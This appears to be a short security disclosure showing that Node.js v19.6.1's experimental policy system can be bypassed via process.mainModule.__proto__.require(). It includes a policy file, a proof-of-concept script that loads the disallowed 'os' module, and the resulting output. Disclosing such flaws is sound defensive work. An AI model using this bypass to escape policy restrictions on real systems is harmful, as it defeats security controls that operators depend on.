process.mainModule.require() correctly works with permission system in Node v19.6.1.
But the use of __proto__ in process.mainModule.__proto__.require() can bypass the check.
Consider the following policy.json:
{
"resources": {
"./proc.js": {
"integrity": true
}
}
}
The policy only allows proc.js file to be loaded without any dependencies.
However with the following proc.js
const os = process.mainModule.__proto__.require("os")
console.log(process.version)
console.log(os.version())
We get the output:
āā$ ../node-v19.6.1-linux-x64/bin/node --experimental-policy=policy.json proc.js
v19.6.1
#1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
(node:2720) ExperimentalWarning: Policies are experimental.
(Use `node --trace-warnings ...` to show where the warning was created)
Therefore os dependency can be loaded and os.version executed even if unspecified in permission system.
Bypass the permission system